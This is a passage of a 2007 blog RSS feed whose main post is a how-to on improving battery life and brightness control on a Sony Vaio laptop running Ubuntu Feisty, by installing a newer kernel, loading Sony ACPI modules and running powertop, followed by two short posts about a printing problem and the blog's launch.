+0000</pubDate><atom:updated>2007-09-04T16:53:01.384-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE</title><description>With some patience, searching in forums, researching, and some luck, I managed to solve the energy problem of my laptop: a Sony Vaio VGN-N350FE using Ubuntu Feisty.&lt;p&gt;&lt;span style="font-weight: bold;"&gt;Warning:&lt;/span&gt; &lt;span style="font-style: italic;"&gt;if you dare to follow this howto, be aware that the system may become unstable, unusable, or worse, like damaging the hardware. Only follow these steps at your own risk.&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;On a clean installation of Ubuntu Feisty, I update every package proposed by the update manager.&lt;/p&gt;&lt;p&gt;I install the kernel 2.6.22.9 (available in Gutsy), for which we need to include the corresponding repositories.&lt;/p&gt;&lt;p&gt;On the command line we execute:&lt;/p&gt; &lt;blockquote&gt;&lt;blockquote&gt; sudo gedit /etc/apt/sources.list&lt;/blockquote&gt;&lt;/blockquote&gt; &lt;p&gt;In the editor, we add the following lines at the end of the file.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;b&gt; deb http://archive.ubuntu.com/ubuntu/ gutsy main restricted&lt;br /&gt;deb http://archive.ubuntu.com/ubuntu/ gutsy universe&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Save and close. Then execute this:&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;b&gt; sudo apt-get update&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;After this, it's possible that the update manager offers us to update a bunch of packages (actually from Gutsy). We shouldn't do it. Only do what's stated here.&lt;/p&gt;&lt;p&gt;We execute:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Since we just installed a new kernel, I believe it's a good idea to restart the notebook. After restarting, we open a new terminal window and we execute:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sudo apt-get install powertop cpufrequtils libncursesw5&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Now we must remove Gutsy's repositories. We execute:&lt;br /&gt;&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;b&gt; sudo gedit /etc/apt/sources.list&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We comment the lines we inserted before, by inserting # at the beginning of the lines.&lt;/p&gt;&lt;p&gt;We update the package manager:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sudo apt-get update&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Now we make sure that sony's energy management modules are installed. We execute:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sudo modprobe sony_acpi&lt;/b&gt;&lt;br /&gt;&lt;b&gt; sudo modprobe sonypi&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We make these modules to load automatically on boot:&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;b&gt; sudo gedit /etc/modules&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We add the two following lines to the end of the file:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sony_acpi&lt;/b&gt;&lt;br /&gt;&lt;b&gt; sonypi&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We execute this to be able to use brightness controls:&lt;br /&gt;&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;b&gt; sudo locate -u &amp;&amp;amp; for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Now we can add the brightness control to Gnome's Panel. After this, reset the notebook, so the brightness control is active.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;When we use our laptop on battery, we need to execute on a terminal:&lt;br /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;b&gt;sudo powertop&lt;/b&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;This opens a text application that tells us which elements are consuming power, and recommends us to carry on certain actions to improve battery's use.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Before this, the battery lasted less than half hour, after this, more than four hours.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;For references, I used these posts:&lt;/p&gt; &lt;p&gt;&lt;a href="http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html" mce_href="http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html" title="http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html"&gt;http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://ubuntuforums.org/showthread.php?t=479034" mce_href="http://ubuntuforums.org/showthread.php?t=479034" title="http://ubuntuforums.org/showthread.php?t=479034"&gt;http://ubuntuforums.org/showthread.php?t=479034&lt;/a&gt;&lt;br /&gt;&lt;a href="http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/" mce_href="http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/" title="http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/"&gt;http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/&lt;/a&gt;&lt;/p&gt; &lt;br /&gt;&lt;p&gt;Technorati tags: &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;Ubuntu&lt;/a&gt;, &lt;a href="http://technorati.com/tag/vaio" rel="tag"&gt;Vaio&lt;/a&gt;, &lt;a href="http://technorati.com/tag/sony+vaio" rel="tag"&gt;Sony Vaio&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Cheers!&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.tuxero.com/2007/08/howto-ubuntu-feisty-sony-vaio-vgn.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;linux&lt;/a&gt; &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/feisty" rel="tag"&gt;feisty&lt;/a&gt; &lt;a href="http://technorati.com/tag/vaio" rel="tag"&gt;vaio&lt;/a&gt; &lt;a href="http://technorati.com/tag/brightness" rel="tag"&gt;brightness&lt;/a&gt; &lt;a href="http://technorati.com/tag/gutsy" rel="tag"&gt;gutsy&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-6821158640668957556?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/0ObPg9IO4Wc/howto-ubuntu-feisty-sony-vaio-vgn.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/howto-ubuntu-feisty-sony-vaio-vgn.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-7966893868711311007</guid><pubDate>Tue, 28 Aug 2007 18:14:00 +0000</pubDate><atom:updated>2007-09-04T16:50:42.435-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">General</category><title>Tuning my notebook</title><description>I recently bought a Sony Vaio VGN-N350FE&lt;br /&gt;At my home-office I have a color laser printer HP 2600n, and with my brand new notebook, I cannot print. Windows Vista throws a "Data Execution Prevention" error, and the spool service dies (before this, I never had any troubles - not with Windows XP, not with &lt;a href="http://www.ubuntu.com"&gt;Ubuntu&lt;/a&gt;).&lt;br /&gt;I googled a lot, and I found no solution. It seems to be a compatibility problem between HP drivers and Windows' new version.&lt;br /&gt;This (and other motives) make me decide to install ubuntu feisty in this machine. Everything is fantastic, except the energy management issue. Keyboard function keys do not work, and following some tutorials led to no solution (apparently, I have a 'too' new model).&lt;br /&gt;So in the mean time, if I use Windows, I cannot print, and if I use Linux, battery duration is less than acceptable.&lt;br /&gt;I can assure you, my estimated reader, that this will continue.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/08/poniendo-punto-mi-notebook.html"&gt;Versión en español&lt;/a&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/vaio" rel="tag"&gt;vaio&lt;/a&gt; &lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;linux&lt;/a&gt; &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/feisty" rel="tag"&gt;feisty&lt;/a&gt; &lt;a href="http://technorati.com/tag/brighness" rel="tag"&gt;brighness&lt;/a&gt; &lt;a href="http://technorati.com/tag/windows+vista" rel="tag"&gt;windows vista&lt;/a&gt; &lt;a href="http://technorati.com/tag/hp" rel="tag"&gt;hp&lt;/a&gt; &lt;a href="http://technorati.com/tag/hp+2600n" rel="tag"&gt;hp+2600n&lt;/a&gt; &lt;a href="http://technorati.com/tag/battery" rel="tag"&gt;battery&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-7966893868711311007?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/MnnucVJksCg/tuning-my-notebook.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/tuning-my-notebook.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-6203881483620704788</guid><pubDate>Tue, 28 Aug 2007 17:33:00 +0000</pubDate><atom:updated>2007-08-30T22:44:28.129-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">General</category><title>First step</title><description>Hello!&lt;br /&gt;This is the first tuxero post, with much expectation and desires.&lt;br /&gt;This is a short salutation, since the main thing of this blog is its contents, not the introduction.&lt;br /&gt;Soon, soon, I'll be adding new contents.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/08/primer-paso.html"&gt;Versión en español&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-6203881483620704788?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/2NDtXQGZtUQ/first-step.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/first-step.html</feedburner:origLink></item></channel></rss>

